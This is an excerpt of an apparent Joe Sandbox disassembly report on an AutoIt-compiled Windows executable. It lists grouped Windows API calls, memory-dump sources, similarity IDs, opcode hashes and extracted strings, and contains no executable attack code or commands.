                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1045
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009E104C
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1062
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        APIs
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0324
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0331
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F033E
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F034B
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0358
                        • CloseHandle.KERNEL32(?,?,?,?,009F017D,?,009F32FC,?,00000001,009C2592,?), ref: 009F0365
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        APIs
                        • _free.LIBCMT ref: 009BD752
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009BD764
                        • _free.LIBCMT ref: 009BD776
                        • _free.LIBCMT ref: 009BD788
                        • _free.LIBCMT ref: 009BD79A
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 009E5C58
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 009E5C6F
                        • MessageBeep.USER32(00000000), ref: 009E5C87
                        • KillTimer.USER32(?,0000040A), ref: 009E5CA3
                        • EndDialog.USER32(?,00000001), ref: 009E5CBD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: ff1d7340b1727e2427f67e6ebb70765fc6b2b6b25a97fbf471db5860b24c7ab7
                        • Instruction ID: 45efc56679fce4d29d27d353130abd970d5984ab978ce0c0cc161d1a7b031728
                        • Opcode Fuzzy Hash: ff1d7340b1727e2427f67e6ebb70765fc6b2b6b25a97fbf471db5860b24c7ab7
                        • Instruction Fuzzy Hash: 5301AD30540B04ABEB21AB51DD5EFE677B8BB04B09F011559E293A10E1DBF4AD85CA90
                        APIs
                        • _free.LIBCMT ref: 009B22BE
                          • Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
                          • Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0
                        • _free.LIBCMT ref: 009B22D0
                        • _free.LIBCMT ref: 009B22E3
                        • _free.LIBCMT ref: 009B22F4
                        • _free.LIBCMT ref: 009B2305
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 2e2a3233b422b00eff0e2dedd099b25207ff2f19133f5d32a5aa2134674109c5
                        • Instruction ID: 7ec0b099663c8f2da13669fbbaf792cc5bb8d0efc6a317468a707145b7c194e1
                        • Opcode Fuzzy Hash: 2e2a3233b422b00eff0e2dedd099b25207ff2f19133f5d32a5aa2134674109c5
                        • Instruction Fuzzy Hash: 3CF0F4794013109BC692EFD8BE01EDC3B69F759772B050A56F418D6271C73105539FE5
                        APIs
                        • EndPath.GDI32(?), ref: 009995D4
                        • StrokeAndFillPath.GDI32(?,?,009D71F7,00000000,?,?,?), ref: 009995F0
                        • SelectObject.GDI32(?,00000000), ref: 00999603
                        • DeleteObject.GDI32 ref: 00999616
                        • StrokePath.GDI32(?), ref: 00999631
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 2df6036c5b76c51de6643ad0a0a69c6ef495afb2b79176d6773cc899caa51459
                        • Instruction ID: aa65775e2b8202a43e09ca72700a3e41b7e1de87c5da747cbb4184df4f2c7e64
                        • Opcode Fuzzy Hash: 2df6036c5b76c51de6643ad0a0a69c6ef495afb2b79176d6773cc899caa51459
                        • Instruction Fuzzy Hash: B6F01430046308EBDB22DFADED18BB93BA9BB05372F448218F865950F0C7308992DF64
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: __freea$_free
                        • String ID: a/p$am/pm
                        • API String ID: 3432400110-3206640213
                        • Opcode ID: 2065fff7083eb4130703fc692bb2d508176a5d9dcf4e59d919e70c8025315f53
                        • Instruction ID: 8ee1d93c4cec42699cd7ad7f74353e61503a8454899b1c595cd4e799fcd561ae
                        • Opcode Fuzzy Hash: 2065fff7083eb4130703fc692bb2d508176a5d9dcf4e59d919e70c8025315f53
                        • Instruction Fuzzy Hash: 0FD12831904206CBCB249F68CA69BFEB7F8FF46330FA84519E5119B650E3759D80CB91
                        APIs
                          • Part of subcall function 009A0242: EnterCriticalSection.KERNEL32(00A5070C,00A51884,?,?,0099198B,00A52518,?,?,?,009812F9,00000000), ref: 009A024D
                          • Part of subcall function 009A0242: LeaveCriticalSection.KERNEL32(00A5070C,?,0099198B,00A52518,?,?,?,009812F9,00000000), ref: 009A028A
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009A00A3: __onexit.LIBCMT ref: 009A00A9
                        • __Init_thread_footer.LIBCMT ref: 00A07BFB
                          • Part of subcall function 009A01F8: EnterCriticalSection.KERNEL32(00A5070C,?,?,00998747,00A52514), ref: 009A0202
                          • Part of subcall function 009A01F8: LeaveCriticalSection.KERNEL32(00A5070C,?,00998747,00A52514), ref: 009A0235
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                        • String ID: 5$G$Variable must be of type 'Object'.
                        • API String ID: 535116098-3733170431
                        • Opcode ID: 0e6410b9ccdc1ec309b2cb1fef7d75e10f38c13b7df0a740e631783b0c5191db
                        • Instruction ID: 2c1d238e636b8c27b7ab14d3eb385c4a64d0c9a47d532d456886a39c421f5c3f
                        • Opcode Fuzzy Hash: 0e6410b9ccdc1ec309b2cb1fef7d75e10f38c13b7df0a740e631783b0c5191db
                        • Instruction Fuzzy Hash: 01917C74A04209AFCB14EF94E991ABEB7B1FF89300F148059F8069B291DB71AE45CB51
                        APIs
                          • Part of subcall function 009EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009E21D0,?,?,00000034,00000800,?,00000034), ref: 009EB42D
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009E2760
                          • Part of subcall function 009EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 009EB3F8
                          • Part of subcall function 009EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 009EB355
                          • Part of subcall function 009EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009E2194,00000034,?,?,00001004,00000000,00000000), ref: 009EB365
                          • Part of subcall function 009EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009E2194,00000034,?,?,00001004,00000000,00000000), ref: 009EB37B
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009E27CD
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009E281A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: 7a5843552f07ecd143978eccf2f16a7f95499c8de98ed5b3298788436dd965a8
                        • Instruction ID: 621050fc487ffc1219fbdc048f268d4a9701c49ce83952002dda882d1960c25f
                        • Opcode Fuzzy Hash: 7a5843552f07ecd143978eccf2f16a7f95499c8de98ed5b3298788436dd965a8
                        • Instruction Fuzzy Hash: 0E415C72900218AFDB11DFA4CD42BEEBBB8EF49300F009095FA55B7181DB716E45CBA1
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\p4LNUqyKZM.exe,00000104), ref: 009B1769
                        • _free.LIBCMT ref: 009B1834
                        • _free.LIBCMT ref: 009B183E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\Desktop\p4LNUqyKZM.exe
                        • API String ID: 2506810119-356200998
                        • Opcode ID: 5c159161fc71f2c78cbe4fba81e134ad78b39c49f59e5ab509776909f66772f1
                        • Instruction ID: c98975794f892a5b6802da17fff34e1c57c9f34e353bff8ffd61ff3e7bf375e0
                        • Opcode Fuzzy Hash: 5c159161fc71f2c78cbe4fba81e134ad78b39c49f59e5ab509776909f66772f1
                        • Instruction Fuzzy Hash: E2316E71A40218ABDB21DF999A95EEEBBFCFB85320F54416AF804D7211DA708E41CB90
                        APIs
                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009EC306
                        • DeleteMenu.USER32(?,00000007,00000000), ref: 009EC34C
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A51990,013658A0), ref: 009EC395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem
                        • String ID: 0
                        • API String ID: 135850232-4108050209
                        • Opcode ID: 6c3d91b634f0a351a00f953daa17a741c7554c7d83432b17b14fff5243e33c45
                        • Instruction ID: 6c91825b7aa7f27b8fc4d35962188b349899f541c4af2a6006b3ce917dbc763b
                        • Opcode Fuzzy Hash: 6c3d91b634f0a351a00f953daa17a741c7554c7d83432b17b14fff5243e33c45
                        • Instruction Fuzzy Hash: 7E41B2B12043819FD721DF26D844F5ABBE8AF85321F048A1DF9A5972D1D730ED06CB62
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A1CC08,00000000,?,?,?,?), ref: 00A144AA
                        • GetWindowLongW.USER32 ref: 00A144C7
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A144D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: e9c9e12a6fb5a0e8555ac02fd345a613e21cd3e2f8a25d34618acb978dcc1abc
                        • Instruction ID: 156ac405e5d1b2d24b4dae4118be53eec8ea3b0b0da3f9e04b3b2fcf41ccb9ff
                        • Opcode Fuzzy Hash: e9c9e12a6fb5a0e8555ac02fd345a613e21cd3e2f8a25d34618acb978dcc1abc
                        • Instruction Fuzzy Hash: 5331AB32200205AFEF209F78DC45BEA7BAAEB48334F208725F975921E0D770EC919B50
                        APIs
                          • Part of subcall function 00A0335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A03077,?,?), ref: 00A03378
                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A0307A
                        • _wcslen.LIBCMT ref: 00A0309B
                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00A03106
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                        • String ID: 255.255.255.255
                        • API String ID: 946324512-2422070025
                        • Opcode ID: 6f2befddb1463483c5e4277b047c849d7dbbf49b15885c5a14a7bb372b04176d
                        • Instruction ID: 4bb475fb338b6f4267e414292a96bcc4a2fe9a75258f1b88cc2cd4034aa50604
                        • Opcode Fuzzy Hash: 6f2befddb1463483c5e4277b047c849d7dbbf49b15885c5a14a7bb372b04176d
                        • Instruction Fuzzy Hash: 4B31D33A6002099FCF10CF68E585EAA77F8EF54318F248159E9158B3D2DB72EE45C761
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A13F40
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A13F54
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A13F78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: 5260ff640d653aa8523228537818f5e6a0d1f440f96e5823d5a8cfb732a45d1e
                        • Instruction ID: 8e2879063012f9595f3a25ba92ff17e83c27385c4ed1815f935561bde6bf3dd9
                        • Opcode Fuzzy Hash: 5260ff640d653aa8523228537818f5e6a0d1f440f96e5823d5a8cfb732a45d1e
                        • Instruction Fuzzy Hash: 07218B33600219BBDF259F90DC46FEA3B7AEB88724F110214FA15AB1D0D6B5A9958B90
                        APIs
                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A14705
                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A14713
                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A1471A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 4014797782-2298589950
                        • Opcode ID: 4c0f78bdb3309cd5fcff72934f109aba49dfa32b16535d8a05ae47266e540bed
                        • Instruction ID: c2bd2f74e5f24a735454fcdb17a6ed0e395db56061406bb69cda0b7fc0307cf2
                        • Opcode Fuzzy Hash: 4c0f78bdb3309cd5fcff72934f109aba49dfa32b16535d8a05ae47266e540bed
                        • Instruction Fuzzy Hash: D52160B5600208AFEB10DF68DCC1DB737ADEB8A7A4B040059FA109B391DB70EC52CB60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 176396367-2734436370
                        • Opcode ID: 958deb6b6eb73ef1a48c42f9dee6fde53336ce410e6c8c43e2aa4635b82dd7ab
                        • Instruction ID: 956497cf0d27fe1cd8626d45533d45077b7935f21e2437accee61d41f0f84280
                        • Opcode Fuzzy Hash: 958deb6b6eb73ef1a48c42f9dee6fde53336ce410e6c8c43e2aa4635b82dd7ab
                        • Instruction Fuzzy Hash: E9215E722046906AC732BB269C06FBBB3DCAFD1700F604826F9499B141EF55DD81C3D5
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A13840
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A13850
                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A13876
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: a3fb18e06e8b2f95a3a62ac3cf33da4d38a917e3d5299fa7595f659eeaa951c5
                        • Instruction ID: 5cfe5605ab8f6661e5b617e43b2472b96ee2b481e061aaf76e7080834996bff5
                        • Opcode Fuzzy Hash: a3fb18e06e8b2f95a3a62ac3cf33da4d38a917e3d5299fa7595f659eeaa951c5
                        • Instruction Fuzzy Hash: 5A217C72610218BBEF21DF95DC85FFB376EEF89760F108124F9149B190CA759C9287A0
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 009F4A08
                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009F4A5C
                        • SetErrorMode.KERNEL32(00000000,?,?,00A1CC08), ref: 009F4AD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                         • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume
                        • String ID: %lu
                        • API String ID: 2507767853-685833217
                        • Opcode ID: 0c96f39c77774036a7716a7bec0546536907d3ee8cd632b8fccfa0ca1fcff42f
                        • Instruction ID: 0fa2738ee66bff6b9aad57af393c174662b09afa1e14dc21bac144490ee1b73f
                        • Opcode Fuzzy Hash: 0c96f39c77774036a7716a7bec0546536907d3ee8cd632b8fccfa0ca1fcff42f
                        • Instruction Fuzzy Hash: F5319174A40108AFDB10DF54C881EAABBF8EF48318F1480A8F909DB352D771ED46CB61
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A1424F
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A14264
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A14271
                        Strings
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: dba42f6e797ab44ccd07c8f6667f1e2994c11765382ab9a07296481e7c537da9
                        • Instruction ID: 0dc21b92f7a2f889ac08aaaf966469aefd1fa3cdc11bf160a86da93a47c442eb
                        • Opcode Fuzzy Hash: dba42f6e797ab44ccd07c8f6667f1e2994c11765382ab9a07296481e7c537da9
                        • Instruction Fuzzy Hash: E311C671240248BEEF209F69CC46FEB3BADEF99B64F110614FA55E6090D671DC919B10
                        APIs
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                          • Part of subcall function 009E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009E2DC5
                          • Part of subcall function 009E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E2DD6
                          • Part of subcall function 009E2DA7: GetCurrentThreadId.KERNEL32 ref: 009E2DDD
                          • Part of subcall function 009E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009E2DE4
                        • GetFocus.USER32 ref: 009E2F78
                          • Part of subcall function 009E2DEE: GetParent.USER32(00000000), ref: 009E2DF9
                        • GetClassNameW.USER32(?,?,00000100), ref: 009E2FC3
                        • EnumChildWindows.USER32(?,009E303B), ref: 009E2FEB
                        Strings
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
